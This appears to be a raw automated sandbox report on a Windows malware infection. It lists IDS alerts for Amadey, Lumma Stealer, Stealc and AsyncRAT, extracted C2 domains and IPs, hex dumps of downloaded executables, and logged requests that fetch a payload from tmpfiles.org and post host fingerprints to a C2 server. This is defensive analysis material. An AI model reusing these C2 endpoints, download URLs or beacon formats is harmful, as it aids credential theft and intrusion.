Source: unknown	HTTPS traffic detected: 172.67.195.247:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50115 version: TLS 1.2

Source:	Binary string: my_library.pdbU source: 0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2842173439.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.0000000004297000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2842173439.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.0000000004297000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: jtb.prototype.Hb=function(a,b){mtb(this);qtb(this)===b?rtb(this,a):this.kb.set(b,a)};var rtb=function(a,b){a.ka={zJ:a.wa.getState().id,Yva:b,listener:null};b()},qtb=function(a){return(a=a.wa.getState())&&(a=a.userData)&&a.PDb?a.PDb:null};_.Yn(_.ERa,jtb); source: chromecache_193.16.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4477947f1f.exe, 0000006E.00000003.2838649270.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_011F163D
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_011F1644
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F715E8h	7_2_05F71530
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F715E8h	7_2_05F71528
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_05F761B0
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_05F761A8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F87AA1h	7_2_05F87C47
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F87675h	7_2_05F872C8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F87675h	7_2_05F872B9
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F87AA1h	7_2_05F87A40
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 4x nop then jmp 05F87AA1h	7_2_05F87A30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49773 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49832 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 162.230.48.189:56001 -> 192.168.2.4:49876
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49871
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49926 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49970 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:57974 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:63059 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:59858 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50007 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:51581 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50008 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:62195 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:60453 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50024 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50048 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50052 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:51429 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:65186 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:58539 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:55330 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63553 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:52992 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:55752 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:64608 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:62114 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50115 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50112 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50108 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50116 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50111 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.4:50114 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:61126 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50024 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50024 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50052 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50052 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50108 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50108 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50111 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50111 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50114 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50114 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50115 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50115 -> 172.67.133.135:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.4:49876 -> 162.230.48.189:56001

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: trashycontinuousbubbly.com to https://www.google.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: trashycontinuousbubbly.com to https://www.google.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: trashycontinuousbubbly.com to https://www.google.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: trashycontinuousbubbly.com to https://www.google.com/

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 06:33:22 GMTContent-Type: application/octet-streamContent-Length: 3249664Last-Modified: Thu, 07 Nov 2024 05:56:00 GMTConnection: keep-aliveETag: "672c5670-319600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 31 00 00 04 00 00 5c 17 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 65 75 71 77 62 64 6f 00 e0 2b 00 00 b0 05 00 00 d8 2b 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 76 61 74 64 66 6c 6a 00 10 00 00 00 90 31 00 00 06 00 00 00 6e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 31 00 00 22 00 00 00 74 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 06:33:30 GMTContent-Type: application/octet-streamContent-Length: 2097152Last-Modified: Thu, 07 Nov 2024 05:56:13 GMTConnection: keep-aliveETag: "672c567d-200000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 40 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 71 00 00 04 00 00 4b f0 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6a 66 6f 61 75 62 69 00 50 19 00 00 e0 57 00 00 50 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 75 76 61 63 68 65 6b 00 10 00 00 00 30 71 00 00 04 00 00 00 da 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 71 00 00 22 00 00 00 de 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 06:33:43 GMTContent-Type: application/octet-streamContent-Length: 2755072Last-Modified: Thu, 07 Nov 2024 06:25:15 GMTConnection: keep-aliveETag: "672c5d4b-2a0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 ea ec 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 71 77 71 77 6e 72 65 69 00 c0 29 00 00 a0 00 00 00 aa 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 73 62 74 7a 63 65 71 00 20 00 00 00 60 2a 00 00 04 00 00 00 e4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2a 00 00 22 00 00 00 e8 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dl/15309322/pohtent2.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /dl/15309322/pohtent2.exe HTTP/1.1Host: tmpfiles.org
